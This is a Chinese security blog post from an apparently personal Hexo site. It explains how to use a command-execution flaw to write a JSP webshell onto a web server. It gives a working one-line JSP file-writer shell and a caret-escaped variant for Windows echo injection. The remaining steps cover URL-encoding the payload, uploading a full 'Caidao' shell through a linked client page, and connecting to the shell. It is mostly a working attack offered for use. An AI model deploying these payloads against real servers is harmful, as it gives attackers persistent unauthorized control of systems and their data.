<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>命令执行写webshell | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="1、jsp 版注意：针对 windows 需要通过^转义的字符包括&lt;&gt;和“针对 linux 需要通过\转义1、非菜刀版一句话 1&lt;%if(request.getParameter(&quot;f&quot;)!&#x3D;null)(new java.io.FileOutputStream(application.getRealPath(&quot;&#x2F;&quot;)+request.getParameter(&quot;f&quot;))).wri">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行写webshell">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="1、jsp 版注意：针对 windows 需要通过^转义的字符包括&lt;&gt;和“针对 linux 需要通过\转义1、非菜刀版一句话 1&lt;%if(request.getParameter(&quot;f&quot;)!&#x3D;null)(new java.io.FileOutputStream(application.getRealPath(&quot;&#x2F;&quot;)+request.getParameter(&quot;f&quot;))).wri">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417737679-4fb0068f-5698-44fc-b02c-eeb95fa4d4a3.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1914&size=86637&status=done&style=none&width=957">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417940305-2a4eb7ee-1cf2-48d2-adb2-6329a7825a34.png#align=left&display=inline&height=382&margin=%5Bobject%20Object%5D&name=image.png&originHeight=763&originWidth=1460&size=82521&status=done&style=none&width=730">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418762577-f26856be-2e9c-496b-8589-2bbc12728670.png#align=left&display=inline&height=86&margin=%5Bobject%20Object%5D&name=image.png&originHeight=171&originWidth=1821&size=16610&status=done&style=none&width=910.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418008814-4fc0ac34-4319-4b94-90e9-6c1d30e4a48c.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=704&originWidth=1424&size=139593&status=done&style=none&width=746">
<meta property="article:published_time" content="2020-08-06T14:49:23.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:20.710Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">无名之辈</h5>
          <a href="mailto:3389006233@qq.com" title="3389006233@qq.com" class="mail">3389006233@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/wakaka123wakaka" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">命令执行写webshell</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">命令执行写webshell</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-08-06T14:49:23.000Z" itemprop="datePublished" class="page-time">
  2020-08-06
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#1、jsp-版"><span class="post-toc-number">1.</span> <span class="post-toc-text">1、jsp 版</span></a></li></ol>
        </nav>
    </aside>


<article id="post-rqob7g"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">命令执行写webshell</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h2 id="1、jsp-版"><a href="#1、jsp-版" class="headerlink" title="1、jsp 版"></a>1、jsp 版</h2><p>注意：<br>针对 windows 需要通过^转义的字符包括<br>&lt;&gt;<br>和<br>“<br>针对 linux 需要通过\转义<br>1、非菜刀版一句话</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%<span class="keyword">if</span>(request.getParameter(<span class="string">"f"</span>)!=<span class="literal">null</span>)(<span class="keyword">new</span> java.io.FileOutputStream(application.getRealPath(<span class="string">"/"</span>)+request.getParameter(<span class="string">"f"</span>))).write(request.getParameter(<span class="string">"t"</span>).getBytes());%&gt;</span><br></pre></td></tr></table></figure>

<p>变形成为</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">^&lt;%<span class="keyword">if</span>(request.getParameter(^<span class="string">"f^"</span>)!=<span class="literal">null</span>)(<span class="keyword">new</span> java.io.FileOutputStream(application.getRealPath(^<span class="string">"/^"</span>)+request.getParameter(^<span class="string">"f^"</span>))).write(request.getParameter(^<span class="string">"t^"</span>).getBytes());%^&gt;</span><br></pre></td></tr></table></figure>

<p>2、通过<a href="https://www.yuque.com/attachments/yuque/0/2020/jar/258143/1596725364326-3beda629-4236-4ce4-a4b3-ae7d88b73e29.jar?_lake_card=%7B%22uid%22%3A%221593417464909-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fjar%2F258143%2F1596725364326-3beda629-4236-4ce4-a4b3-ae7d88b73e29.jar%22%2C%22name%22%3A%22CTFcrackTools.jar%22%2C%22size%22%3A10782824%2C%22type%22%3A%22%22%2C%22ext%22%3A%22jar%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22e0Ug9%22%2C%22card%22%3A%22file%22%7D">CTFcrackTools.jar</a>对 echo 等内容进行 url 编码</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>3、写入非菜刀版一句话</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417737679-4fb0068f-5698-44fc-b02c-eeb95fa4d4a3.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1914&size=86637&status=done&style=none&width=957" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>4、访问<a href="https://www.yuque.com/attachments/yuque/0/2020/html/258143/1596725364457-638d450e-2ebd-45bd-b14e-f80e4ff3ee63.html?_lake_card=%7B%22uid%22%3A%221593417829272-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fhtml%2F258143%2F1596725364457-638d450e-2ebd-45bd-b14e-f80e4ff3ee63.html%22%2C%22name%22%3A%22jsp%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%AE%A2%E6%88%B7%E7%AB%AF.html%22%2C%22size%22%3A668%2C%22type%22%3A%22text%2Fhtml%22%2C%22ext%22%3A%22html%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22WEoLT%22%2C%22card%22%3A%22file%22%7D">jsp 一句话客户端.html</a>，上传菜刀版 shell<a href="https://www.yuque.com/attachments/yuque/0/2020/jsp/258143/1596725364594-bfd9e462-b29d-48fd-9029-455a26b78aba.jsp?_lake_card=%7B%22uid%22%3A%221593417974391-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fjsp%2F258143%2F1596725364594-bfd9e462-b29d-48fd-9029-455a26b78aba.jsp%22%2C%22name%22%3A%221.jsp%22%2C%22size%22%3A9129%2C%22type%22%3A%22%22%2C%22ext%22%3A%22jsp%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22evfM2%22%2C%22card%22%3A%22file%22%7D">1.jsp</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417940305-2a4eb7ee-1cf2-48d2-adb2-6329a7825a34.png#align=left&display=inline&height=382&margin=%5Bobject%20Object%5D&name=image.png&originHeight=763&originWidth=1460&size=82521&status=done&style=none&width=730" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>5、连接菜刀成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418762577-f26856be-2e9c-496b-8589-2bbc12728670.png#align=left&display=inline&height=86&margin=%5Bobject%20Object%5D&name=image.png&originHeight=171&originWidth=1821&size=16610&status=done&style=none&width=910.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418008814-4fc0ac34-4319-4b94-90e9-6c1d30e4a48c.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=704&originWidth=1424&size=139593&status=done&style=none&width=746" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:20.710Z" itemprop="dateUpdated">2020-08-14 23:17:20</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2020/08/06/rqob7g/" target="_blank" rel="external">https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/</a>
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&title=《命令执行写webshell》 — 小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&title=《命令执行写webshell》 — 小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《命令执行写webshell》 — 小白帽&url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2020/08/06/rhhcg2/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">BadUSB制作</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2020/07/28/dlvqrg/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">中间件漏洞</h4>
      </a>
    </div>
  
</nav>



    




















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/wechat.jpg" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/wechat.jpg" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>无名之辈 &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&title=《命令执行写webshell》 — 小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&title=《命令执行写webshell》 — 小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《命令执行写webshell》 — 小白帽&url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



	<script type="text/javascript" src="hexo_resize_image.js"></script>
</body>
</html>
